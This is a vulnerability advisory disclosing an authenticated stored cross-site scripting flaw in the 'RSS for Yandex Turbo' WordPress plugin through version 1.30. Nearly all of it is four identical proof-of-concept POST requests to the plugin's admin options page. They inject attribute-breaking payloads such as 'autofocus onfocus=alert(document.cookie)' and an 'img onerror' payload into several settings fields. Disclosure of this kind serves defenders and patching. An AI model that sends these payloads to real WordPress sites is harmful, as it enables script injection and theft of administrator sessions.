RSS for Yandex Turbo <= 1.30 - Authenticated Stored XSS

The plugin does not sanitise or escape some of its settings before saving and outputing them in the admin dashboard, leading to an Authenticated Stored Cross-Site Scripting issue even when the unfiltered_html capability is disallowed.

PoC

Vulnerable parameter(s): &ytnetw;=, &ytnetwspan;=, &ytfeedbacknetw;=, &ytfeedbacknetwspan;=, &ytratingmin;=, &ytratingmax;=. PoC #1 | Authenticated Persistent XSS | Блоки Яндекс.Турбо > Социальные сети > Порядок: POST /wp-admin/options-general.php?page=rss-for-yandex-turbo.php HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 3937 yttab=%D0%91%D0%BB%D0%BE%D0%BA%D0%B8+%D0%AF%D0%BD%D0%B4%D0%B5%D0%BA%D1%81.%D0%A2%D1%83%D1%80%D0%B1%D0%BE&ytrssname;=turbo&yttitle;=PoC+by+m0ze&ytlink;=https%3A%2F%2Fexample.com&ytdescription;=Just+another+vulnerable+WordPress+website&ytlanguage;=ru&ytnumber;=250&ytrazbnumber;=50&ytdeltracking;=enabled&ytexcludeurlslist;=&ytprotokol;=asis&ytdateformat;=mod&ytselectthumb;=large&ytauthorselect;=%D0%A3%D0%BA%D0%B0%D0%B7%D0%B0%D1%82%D1%8C+%D0%B0%D0%B2%D1%82%D0%BE%D1%80%D0%B0&ytauthor;=&ytfigcaption;=%D0%9E%D1%82%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D1%8C+%D0%BE%D0%BF%D0%B8%D1%81%D0%B0%D0%BD%D0%B8%D1%8F&yttoczag;=%D0%A1%D0%BE%D0%B4%D0%B5%D1%80%D0%B6%D0%B0%D0%BD%D0%B8%D0%B5&yttocmesto;=%D0%92+%D0%BD%D0%B0%D1%87%D0%B0%D0%BB%D0%B5+%D0%B7%D0%B0%D0%BF%D0%B8%D1%81%D0%B8&yttocnumber;=2&yttoch2;=enabled&yttoch3;=enabled&ytselectmenu;=%D0%9D%D0%B5+%D0%B8%D1%81%D0%BF%D0%BE%D0%BB%D1%8C%D0%B7%D0%BE%D0%B2%D0%B0%D1%82%D1%8C&ytshare;=enabled&networks;%5B%5D=on&ytnetw;=%22+autofocus+onfocus%3Dalert%28document.cookie%29%3B+m0ze%22%3E%3Cdiv+m0ze&ytnetwspan;=%22+autofocus+onfocus%3Dalert%28document.cookie%29%3B+m0ze%22%3E%3Cdiv+m0ze&ytfeedback;=enabled&ytfeedbackselect;=right&ytfeedbackselectmesto;=%D0%92+%D0%BA%D0%BE%D0%BD%D1%86%D0%B5+%D0%B7%D0%B0%D0%BF%D0%B8%D1%81%D0%B8&ytfeedbacktitle;=%D0%9E%D0%B1%D1%80%D0%B0%D1%82%D0%BD%D0%B0%D1%8F+%D1%81%D0%B2%D1%8F%D0%B7%D1%8C&networks2;%5B%5D=on&ytfeedbacknetw;=%22+autofocus+onfocus%3Dalert%28document.cookie%29%3B+m0ze%22%3E%3Cdiv+m0ze&ytfeedbacknetwspan;=%22+autofocus+onfocus%3Dalert%28document.cookie%29%3B+m0ze%22%3E%3Cdiv+m0ze&ytfeedbackcontacts;=myselect&ytfeedbackcall;=&ytfeedbackcallback;=&ytfeedbackcallback2;=&ytfeedbackcallback3;=&ytfeedbackmail;=&ytfeedbackvkontakte;=&ytfeedbackodnoklassniki;=&ytfeedbacktwitter;=&ytfeedbackfacebook;=&ytfeedbackviber;=&ytfeedbackwhatsapp;=&ytfeedbacktelegram;=&ytcommentsnumber;=40&ytcommentsorder;=%D0%92+%D0%BD%D0%B0%D1%87%D0%B0%D0%BB%D0%B5+%D0%BD%D0%BE%D0%B2%D1%8B%D0%B5+%D0%BA%D0%BE%D0%BC%D0%BC%D0%B5%D0%BD%D1%82%D0%B0%D1%80%D0%B8%D0%B8&ytcommentsdate;=enabled&ytcommentsdrevo;=enabled&ytrelatednumber;=5&ytrelateddate;=12&ytrelatedselectthumb;=thumbnail&ytrelatedcache;=enabled&ytrelatedcachetime;=72&ytrating;=enabled&ytratingmin;=1%22+autofocus+onfocus%3Dalert%28origin%29%3B+m0ze&ytratingmax;=5%22+autofocus+onfocus%3Dalert%28origin%29%3B+m0ze&ytsearchplaceholder;=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%BF%D0%BE+%D1%81%D0%B0%D0%B9%D1%82%D1%83%22%3E–%21%3E%22+autofocus+onfocus%3Dalert%28%60m0ze%60%29%3Bonclick%3D%3Balert%28%60m0ze%60%29%3Bautofocus%3Dautofocus+onfocus%3D%3Balert%28%60m0ze%60%29%3B+autofocus%3D%3Balert%28%29%3B%2F%2F+type%3Dpassword+%22%3Eautofocus%2Fonfocus%3D%22alert%2813%29%3B%3Eautofocus%2Fonfocus%3D%22alert%2813%29%3B%3C%2Fif%3Cimg+src%3Dx+onerror%3Dalert%2888%29+x%3Dy&ytsearchmesto;=%D0%92+%D0%BD%D0%B0%D1%87%D0%B0%D0%BB%D0%B5+%D0%B7%D0%B0%D0%BF%D0%B8%D1%81%D0%B8&submit;=%D0%A1%D0%BE%D1%85%D1%80%D0%B0%D0%BD%D0%B8%D1%82%D1%8C+%D0%BD%D0%B0%D1%81%D1%82%D1%80%D0%BE%D0%B9%D0%BA%D0%B8+%C2%BB&ytmetrika;=&ytliveinternet;=&ytgoogle;=&ytmailru;=&ytrambler;=&ytmediascope;=&ytad1set;=%D0%A0%D0%A1%D0%AF&ytad1rsa;=&ytadfox1;=&ytad2set;=%D0%A0%D0%A1%D0%AF&ytad2rsa;=&ytadfox2;=&ytad3set;=%D0%A0%D0%A1%D0%AF&ytad3rsa;=&ytadfox3;=&ytad4set;=%D0%A0%D0%A1%D0%AF&ytad4rsa;=&ytadfox4;=&ytad5set;=%D0%A0%D0%A1%D0%AF&ytad5rsa;=&ytadfox5;=&ytrazmer;=500&ytqueryselect;=%D0%92%D1%81%D0%B5+%D1%82%D0%B0%D0%BA%D1%81%D0%BE%D0%BD%D0%BE%D0%BC%D0%B8%D0%B8%2C+%D0%BA%D1%80%D0%BE%D0%BC%D0%B5+%D0%B8%D1%81%D0%BA%D0%BB%D1%8E%D1%87%D0%B5%D0%BD%D0%BD%D1%8B%D1%85&ytexcludetagslist-input;=%5B%7B%22value%22%3A%22span%22%7D%5D&ytexcludetagslist;=span&ytexcludetagslist-input2;=%5B%7B%22value%22%3A%22script%22%7D%2C%7B%22value%22%3A%22style%22%7D%5D&ytexcludetagslist2;=script%2Cstyle&ytexcludecontentlist;=%3C%21–more–%3E%0D%0A%3Cp%3E%3C%2Fp%3E%0D%0A%3Cp%3E%26nbsp%3B%3C%2Fp%3E&yturbo;_nonce=c1dacbe565&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drss-for-yandex-turbo.php&yturbo;_display_exclude_terms-nonce=e0e7e1bf4b PoC #2 | Authenticated Persistent XSS | Блоки Яндекс.Турбо > Блок обратной связи > Порядок кнопок: POST /wp-admin/options-general.php?page=rss-for-yandex-turbo.php HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 3937 yttab=%D0%91%D0%BB%D0%BE%D0%BA%D0%B8+%D0%AF%D0%BD%D0%B4%D0%B5%D0%BA%D1%81.%D0%A2%D1%83%D1%80%D0%B1%D0%BE&ytrssname;=turbo&yttitle;=PoC+by+m0ze&ytlink;=https%3A%2F%2Fexample.com&ytdescription;=Just+another+vulnerable+WordPress+website&ytlanguage;=ru&ytnumber;=250&ytrazbnumber;=50&ytdeltracking;=enabled&ytexcludeurlslist;=&ytprotokol;=asis&ytdateformat;=mod&ytselectthumb;=large&ytauthorselect;=%D0%A3%D0%BA%D0%B0%D0%B7%D0%B0%D1%82%D1%8C+%D0%B0%D0%B2%D1%82%D0%BE%D1%80%D0%B0&ytauthor;=&ytfigcaption;=%D0%9E%D1%82%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D1%8C+%D0%BE%D0%BF%D0%B8%D1%81%D0%B0%D0%BD%D0%B8%D1%8F&yttoczag;=%D0%A1%D0%BE%D0%B4%D0%B5%D1%80%D0%B6%D0%B0%D0%BD%D0%B8%D0%B5&yttocmesto;=%D0%92+%D0%BD%D0%B0%D1%87%D0%B0%D0%BB%D0%B5+%D0%B7%D0%B0%D0%BF%D0%B8%D1%81%D0%B8&yttocnumber;=2&yttoch2;=enabled&yttoch3;=enabled&ytselectmenu;=%D0%9D%D0%B5+%D0%B8%D1%81%D0%BF%D0%BE%D0%BB%D1%8C%D0%B7%D0%BE%D0%B2%D0%B0%D1%82%D1%8C&ytshare;=enabled&networks;%5B%5D=on&ytnetw;=%22+autofocus+onfocus%3Dalert%28document.cookie%29%3B+m0ze%22%3E%3Cdiv+m0ze&ytnetwspan;=%22+autofocus+onfocus%3Dalert%28document.cookie%29%3B+m0ze%22%3E%3Cdiv+m0ze&ytfeedback;=enabled&ytfeedbackselect;=right&ytfeedbackselectmesto;=%D0%92+%D0%BA%D0%BE%D0%BD%D1%86%D0%B5+%D0%B7%D0%B0%D0%BF%D0%B8%D1%81%D0%B8&ytfeedbacktitle;=%D0%9E%D0%B1%D1%80%D0%B0%D1%82%D0%BD%D0%B0%D1%8F+%D1%81%D0%B2%D1%8F%D0%B7%D1%8C&networks2;%5B%5D=on&ytfeedbacknetw;=%22+autofocus+onfocus%3Dalert%28document.cookie%29%3B+m0ze%22%3E%3Cdiv+m0ze&ytfeedbacknetwspan;=%22+autofocus+onfocus%3Dalert%28document.cookie%29%3B+m0ze%22%3E%3Cdiv+m0ze&ytfeedbackcontacts;=myselect&ytfeedbackcall;=&ytfeedbackcallback;=&ytfeedbackcallback2;=&ytfeedbackcallback3;=&ytfeedbackmail;=&ytfeedbackvkontakte;=&ytfeedbackodnoklassniki;=&ytfeedbacktwitter;=&ytfeedbackfacebook;=&ytfeedbackviber;=&ytfeedbackwhatsapp;=&ytfeedbacktelegram;=&ytcommentsnumber;=40&ytcommentsorder;=%D0%92+%D0%BD%D0%B0%D1%87%D0%B0%D0%BB%D0%B5+%D0%BD%D0%BE%D0%B2%D1%8B%D0%B5+%D0%BA%D0%BE%D0%BC%D0%BC%D0%B5%D0%BD%D1%82%D0%B0%D1%80%D0%B8%D0%B8&ytcommentsdate;=enabled&ytcommentsdrevo;=enabled&ytrelatednumber;=5&ytrelateddate;=12&ytrelatedselectthumb;=thumbnail&ytrelatedcache;=enabled&ytrelatedcachetime;=72&ytrating;=enabled&ytratingmin;=1%22+autofocus+onfocus%3Dalert%28origin%29%3B+m0ze&ytratingmax;=5%22+autofocus+onfocus%3Dalert%28origin%29%3B+m0ze&ytsearchplaceholder;=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%BF%D0%BE+%D1%81%D0%B0%D0%B9%D1%82%D1%83%22%3E–%21%3E%22+autofocus+onfocus%3Dalert%28%60m0ze%60%29%3Bonclick%3D%3Balert%28%60m0ze%60%29%3Bautofocus%3Dautofocus+onfocus%3D%3Balert%28%60m0ze%60%29%3B+autofocus%3D%3Balert%28%29%3B%2F%2F+type%3Dpassword+%22%3Eautofocus%2Fonfocus%3D%22alert%2813%29%3B%3Eautofocus%2Fonfocus%3D%22alert%2813%29%3B%3C%2Fif%3Cimg+src%3Dx+onerror%3Dalert%2888%29+x%3Dy&ytsearchmesto;=%D0%92+%D0%BD%D0%B0%D1%87%D0%B0%D0%BB%D0%B5+%D0%B7%D0%B0%D0%BF%D0%B8%D1%81%D0%B8&submit;=%D0%A1%D0%BE%D1%85%D1%80%D0%B0%D0%BD%D0%B8%D1%82%D1%8C+%D0%BD%D0%B0%D1%81%D1%82%D1%80%D0%BE%D0%B9%D0%BA%D0%B8+%C2%BB&ytmetrika;=&ytliveinternet;=&ytgoogle;=&ytmailru;=&ytrambler;=&ytmediascope;=&ytad1set;=%D0%A0%D0%A1%D0%AF&ytad1rsa;=&ytadfox1;=&ytad2set;=%D0%A0%D0%A1%D0%AF&ytad2rsa;=&ytadfox2;=&ytad3set;=%D0%A0%D0%A1%D0%AF&ytad3rsa;=&ytadfox3;=&ytad4set;=%D0%A0%D0%A1%D0%AF&ytad4rsa;=&ytadfox4;=&ytad5set;=%D0%A0%D0%A1%D0%AF&ytad5rsa;=&ytadfox5;=&ytrazmer;=500&ytqueryselect;=%D0%92%D1%81%D0%B5+%D1%82%D0%B0%D0%BA%D1%81%D0%BE%D0%BD%D0%BE%D0%BC%D0%B8%D0%B8%2C+%D0%BA%D1%80%D0%BE%D0%BC%D0%B5+%D0%B8%D1%81%D0%BA%D0%BB%D1%8E%D1%87%D0%B5%D0%BD%D0%BD%D1%8B%D1%85&ytexcludetagslist-input;=%5B%7B%22value%22%3A%22span%22%7D%5D&ytexcludetagslist;=span&ytexcludetagslist-input2;=%5B%7B%22value%22%3A%22script%22%7D%2C%7B%22value%22%3A%22style%22%7D%5D&ytexcludetagslist2;=script%2Cstyle&ytexcludecontentlist;=%3C%21–more–%3E%0D%0A%3Cp%3E%3C%2Fp%3E%0D%0A%3Cp%3E%26nbsp%3B%3C%2Fp%3E&yturbo;_nonce=c1dacbe565&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drss-for-yandex-turbo.php&yturbo;_display_exclude_terms-nonce=e0e7e1bf4b PoC #3 | Authenticated Persistent XSS | Блоки Яндекс.Турбо > Рейтинг > Диапазон оценок > От: POST /wp-admin/options-general.php?page=rss-for-yandex-turbo.php HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 3937 yttab=%D0%91%D0%BB%D0%BE%D0%BA%D0%B8+%D0%AF%D0%BD%D0%B4%D0%B5%D0%BA%D1%81.%D0%A2%D1%83%D1%80%D0%B1%D0%BE&ytrssname;=turbo&yttitle;=PoC+by+m0ze&ytlink;=https%3A%2F%2Fexample.com&ytdescription;=Just+another+vulnerable+WordPress+website&ytlanguage;=ru&ytnumber;=250&ytrazbnumber;=50&ytdeltracking;=enabled&ytexcludeurlslist;=&ytprotokol;=asis&ytdateformat;=mod&ytselectthumb;=large&ytauthorselect;=%D0%A3%D0%BA%D0%B0%D0%B7%D0%B0%D1%82%D1%8C+%D0%B0%D0%B2%D1%82%D0%BE%D1%80%D0%B0&ytauthor;=&ytfigcaption;=%D0%9E%D1%82%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D1%8C+%D0%BE%D0%BF%D0%B8%D1%81%D0%B0%D0%BD%D0%B8%D1%8F&yttoczag;=%D0%A1%D0%BE%D0%B4%D0%B5%D1%80%D0%B6%D0%B0%D0%BD%D0%B8%D0%B5&yttocmesto;=%D0%92+%D0%BD%D0%B0%D1%87%D0%B0%D0%BB%D0%B5+%D0%B7%D0%B0%D0%BF%D0%B8%D1%81%D0%B8&yttocnumber;=2&yttoch2;=enabled&yttoch3;=enabled&ytselectmenu;=%D0%9D%D0%B5+%D0%B8%D1%81%D0%BF%D0%BE%D0%BB%D1%8C%D0%B7%D0%BE%D0%B2%D0%B0%D1%82%D1%8C&ytshare;=enabled&networks;%5B%5D=on&ytnetw;=%22+autofocus+onfocus%3Dalert%28document.cookie%29%3B+m0ze%22%3E%3Cdiv+m0ze&ytnetwspan;=%22+autofocus+onfocus%3Dalert%28document.cookie%29%3B+m0ze%22%3E%3Cdiv+m0ze&ytfeedback;=enabled&ytfeedbackselect;=right&ytfeedbackselectmesto;=%D0%92+%D0%BA%D0%BE%D0%BD%D1%86%D0%B5+%D0%B7%D0%B0%D0%BF%D0%B8%D1%81%D0%B8&ytfeedbacktitle;=%D0%9E%D0%B1%D1%80%D0%B0%D1%82%D0%BD%D0%B0%D1%8F+%D1%81%D0%B2%D1%8F%D0%B7%D1%8C&networks2;%5B%5D=on&ytfeedbacknetw;=%22+autofocus+onfocus%3Dalert%28document.cookie%29%3B+m0ze%22%3E%3Cdiv+m0ze&ytfeedbacknetwspan;=%22+autofocus+onfocus%3Dalert%28document.cookie%29%3B+m0ze%22%3E%3Cdiv+m0ze&ytfeedbackcontacts;=myselect&ytfeedbackcall;=&ytfeedbackcallback;=&ytfeedbackcallback2;=&ytfeedbackcallback3;=&ytfeedbackmail;=&ytfeedbackvkontakte;=&ytfeedbackodnoklassniki;=&ytfeedbacktwitter;=&ytfeedbackfacebook;=&ytfeedbackviber;=&ytfeedbackwhatsapp;=&ytfeedbacktelegram;=&ytcommentsnumber;=40&ytcommentsorder;=%D0%92+%D0%BD%D0%B0%D1%87%D0%B0%D0%BB%D0%B5+%D0%BD%D0%BE%D0%B2%D1%8B%D0%B5+%D0%BA%D0%BE%D0%BC%D0%BC%D0%B5%D0%BD%D1%82%D0%B0%D1%80%D0%B8%D0%B8&ytcommentsdate;=enabled&ytcommentsdrevo;=enabled&ytrelatednumber;=5&ytrelateddate;=12&ytrelatedselectthumb;=thumbnail&ytrelatedcache;=enabled&ytrelatedcachetime;=72&ytrating;=enabled&ytratingmin;=1%22+autofocus+onfocus%3Dalert%28origin%29%3B+m0ze&ytratingmax;=5%22+autofocus+onfocus%3Dalert%28origin%29%3B+m0ze&ytsearchplaceholder;=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%BF%D0%BE+%D1%81%D0%B0%D0%B9%D1%82%D1%83%22%3E–%21%3E%22+autofocus+onfocus%3Dalert%28%60m0ze%60%29%3Bonclick%3D%3Balert%28%60m0ze%60%29%3Bautofocus%3Dautofocus+onfocus%3D%3Balert%28%60m0ze%60%29%3B+autofocus%3D%3Balert%28%29%3B%2F%2F+type%3Dpassword+%22%3Eautofocus%2Fonfocus%3D%22alert%2813%29%3B%3Eautofocus%2Fonfocus%3D%22alert%2813%29%3B%3C%2Fif%3Cimg+src%3Dx+onerror%3Dalert%2888%29+x%3Dy&ytsearchmesto;=%D0%92+%D0%BD%D0%B0%D1%87%D0%B0%D0%BB%D0%B5+%D0%B7%D0%B0%D0%BF%D0%B8%D1%81%D0%B8&submit;=%D0%A1%D0%BE%D1%85%D1%80%D0%B0%D0%BD%D0%B8%D1%82%D1%8C+%D0%BD%D0%B0%D1%81%D1%82%D1%80%D0%BE%D0%B9%D0%BA%D0%B8+%C2%BB&ytmetrika;=&ytliveinternet;=&ytgoogle;=&ytmailru;=&ytrambler;=&ytmediascope;=&ytad1set;=%D0%A0%D0%A1%D0%AF&ytad1rsa;=&ytadfox1;=&ytad2set;=%D0%A0%D0%A1%D0%AF&ytad2rsa;=&ytadfox2;=&ytad3set;=%D0%A0%D0%A1%D0%AF&ytad3rsa;=&ytadfox3;=&ytad4set;=%D0%A0%D0%A1%D0%AF&ytad4rsa;=&ytadfox4;=&ytad5set;=%D0%A0%D0%A1%D0%AF&ytad5rsa;=&ytadfox5;=&ytrazmer;=500&ytqueryselect;=%D0%92%D1%81%D0%B5+%D1%82%D0%B0%D0%BA%D1%81%D0%BE%D0%BD%D0%BE%D0%BC%D0%B8%D0%B8%2C+%D0%BA%D1%80%D0%BE%D0%BC%D0%B5+%D0%B8%D1%81%D0%BA%D0%BB%D1%8E%D1%87%D0%B5%D0%BD%D0%BD%D1%8B%D1%85&ytexcludetagslist-input;=%5B%7B%22value%22%3A%22span%22%7D%5D&ytexcludetagslist;=span&ytexcludetagslist-input2;=%5B%7B%22value%22%3A%22script%22%7D%2C%7B%22value%22%3A%22style%22%7D%5D&ytexcludetagslist2;=script%2Cstyle&ytexcludecontentlist;=%3C%21–more–%3E%0D%0A%3Cp%3E%3C%2Fp%3E%0D%0A%3Cp%3E%26nbsp%3B%3C%2Fp%3E&yturbo;_nonce=c1dacbe565&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drss-for-yandex-turbo.php&yturbo;_display_exclude_terms-nonce=e0e7e1bf4b PoC #4 | Authenticated Persistent XSS | Блоки Яндекс.Турбо > Рейтинг > Диапазон оценок > До: POST /wp-admin/options-general.php?page=rss-for-yandex-turbo.php HTTP/2 Host: example.com Cookie: [admin cookies] User-Agent: Mozilla/5.0 Content-Type: application/x-www-form-urlencoded Content-Length: 3937 yttab=%D0%91%D0%BB%D0%BE%D0%BA%D0%B8+%D0%AF%D0%BD%D0%B4%D0%B5%D0%BA%D1%81.%D0%A2%D1%83%D1%80%D0%B1%D0%BE&ytrssname;=turbo&yttitle;=PoC+by+m0ze&ytlink;=https%3A%2F%2Fexample.com&ytdescription;=Just+another+vulnerable+WordPress+website&ytlanguage;=ru&ytnumber;=250&ytrazbnumber;=50&ytdeltracking;=enabled&ytexcludeurlslist;=&ytprotokol;=asis&ytdateformat;=mod&ytselectthumb;=large&ytauthorselect;=%D0%A3%D0%BA%D0%B0%D0%B7%D0%B0%D1%82%D1%8C+%D0%B0%D0%B2%D1%82%D0%BE%D1%80%D0%B0&ytauthor;=&ytfigcaption;=%D0%9E%D1%82%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D1%8C+%D0%BE%D0%BF%D0%B8%D1%81%D0%B0%D0%BD%D0%B8%D1%8F&yttoczag;=%D0%A1%D0%BE%D0%B4%D0%B5%D1%80%D0%B6%D0%B0%D0%BD%D0%B8%D0%B5&yttocmesto;=%D0%92+%D0%BD%D0%B0%D1%87%D0%B0%D0%BB%D0%B5+%D0%B7%D0%B0%D0%BF%D0%B8%D1%81%D0%B8&yttocnumber;=2&yttoch2;=enabled&yttoch3;=enabled&ytselectmenu;=%D0%9D%D0%B5+%D0%B8%D1%81%D0%BF%D0%BE%D0%BB%D1%8C%D0%B7%D0%BE%D0%B2%D0%B0%D1%82%D1%8C&ytshare;=enabled&networks;%5B%5D=on&ytnetw;=%22+autofocus+onfocus%3Dalert%28document.cookie%29%3B+m0ze%22%3E%3Cdiv+m0ze&ytnetwspan;=%22+autofocus+onfocus%3Dalert%28document.cookie%29%3B+m0ze%22%3E%3Cdiv+m0ze&ytfeedback;=enabled&ytfeedbackselect;=right&ytfeedbackselectmesto;=%D0%92+%D0%BA%D0%BE%D0%BD%D1%86%D0%B5+%D0%B7%D0%B0%D0%BF%D0%B8%D1%81%D0%B8&ytfeedbacktitle;=%D0%9E%D0%B1%D1%80%D0%B0%D1%82%D0%BD%D0%B0%D1%8F+%D1%81%D0%B2%D1%8F%D0%B7%D1%8C&networks2;%5B%5D=on&ytfeedbacknetw;=%22+autofocus+onfocus%3Dalert%28document.cookie%29%3B+m0ze%22%3E%3Cdiv+m0ze&ytfeedbacknetwspan;=%22+autofocus+onfocus%3Dalert%28document.cookie%29%3B+m0ze%22%3E%3Cdiv+m0ze&ytfeedbackcontacts;=myselect&ytfeedbackcall;=&ytfeedbackcallback;=&ytfeedbackcallback2;=&ytfeedbackcallback3;=&ytfeedbackmail;=&ytfeedbackvkontakte;=&ytfeedbackodnoklassniki;=&ytfeedbacktwitter;=&ytfeedbackfacebook;=&ytfeedbackviber;=&ytfeedbackwhatsapp;=&ytfeedbacktelegram;=&ytcommentsnumber;=40&ytcommentsorder;=%D0%92+%D0%BD%D0%B0%D1%87%D0%B0%D0%BB%D0%B5+%D0%BD%D0%BE%D0%B2%D1%8B%D0%B5+%D0%BA%D0%BE%D0%BC%D0%BC%D0%B5%D0%BD%D1%82%D0%B0%D1%80%D0%B8%D0%B8&ytcommentsdate;=enabled&ytcommentsdrevo;=enabled&ytrelatednumber;=5&ytrelateddate;=12&ytrelatedselectthumb;=thumbnail&ytrelatedcache;=enabled&ytrelatedcachetime;=72&ytrating;=enabled&ytratingmin;=1%22+autofocus+onfocus%3Dalert%28origin%29%3B+m0ze&ytratingmax;=5%22+autofocus+onfocus%3Dalert%28origin%29%3B+m0ze&ytsearchplaceholder;=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA+%D0%BF%D0%BE+%D1%81%D0%B0%D0%B9%D1%82%D1%83%22%3E–%21%3E%22+autofocus+onfocus%3Dalert%28%60m0ze%60%29%3Bonclick%3D%3Balert%28%60m0ze%60%29%3Bautofocus%3Dautofocus+onfocus%3D%3Balert%28%60m0ze%60%29%3B+autofocus%3D%3Balert%28%29%3B%2F%2F+type%3Dpassword+%22%3Eautofocus%2Fonfocus%3D%22alert%2813%29%3B%3Eautofocus%2Fonfocus%3D%22alert%2813%29%3B%3C%2Fif%3Cimg+src%3Dx+onerror%3Dalert%2888%29+x%3Dy&ytsearchmesto;=%D0%92+%D0%BD%D0%B0%D1%87%D0%B0%D0%BB%D0%B5+%D0%B7%D0%B0%D0%BF%D0%B8%D1%81%D0%B8&submit;=%D0%A1%D0%BE%D1%85%D1%80%D0%B0%D0%BD%D0%B8%D1%82%D1%8C+%D0%BD%D0%B0%D1%81%D1%82%D1%80%D0%BE%D0%B9%D0%BA%D0%B8+%C2%BB&ytmetrika;=&ytliveinternet;=&ytgoogle;=&ytmailru;=&ytrambler;=&ytmediascope;=&ytad1set;=%D0%A0%D0%A1%D0%AF&ytad1rsa;=&ytadfox1;=&ytad2set;=%D0%A0%D0%A1%D0%AF&ytad2rsa;=&ytadfox2;=&ytad3set;=%D0%A0%D0%A1%D0%AF&ytad3rsa;=&ytadfox3;=&ytad4set;=%D0%A0%D0%A1%D0%AF&ytad4rsa;=&ytadfox4;=&ytad5set;=%D0%A0%D0%A1%D0%AF&ytad5rsa;=&ytadfox5;=&ytrazmer;=500&ytqueryselect;=%D0%92%D1%81%D0%B5+%D1%82%D0%B0%D0%BA%D1%81%D0%BE%D0%BD%D0%BE%D0%BC%D0%B8%D0%B8%2C+%D0%BA%D1%80%D0%BE%D0%BC%D0%B5+%D0%B8%D1%81%D0%BA%D0%BB%D1%8E%D1%87%D0%B5%D0%BD%D0%BD%D1%8B%D1%85&ytexcludetagslist-input;=%5B%7B%22value%22%3A%22span%22%7D%5D&ytexcludetagslist;=span&ytexcludetagslist-input2;=%5B%7B%22value%22%3A%22script%22%7D%2C%7B%22value%22%3A%22style%22%7D%5D&ytexcludetagslist2;=script%2Cstyle&ytexcludecontentlist;=%3C%21–more–%3E%0D%0A%3Cp%3E%3C%2Fp%3E%0D%0A%3Cp%3E%26nbsp%3B%3C%2Fp%3E&yturbo;_nonce=c1dacbe565&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drss-for-yandex-turbo.php&yturbo;_display_exclude_terms-nonce=e0e7e1bf4b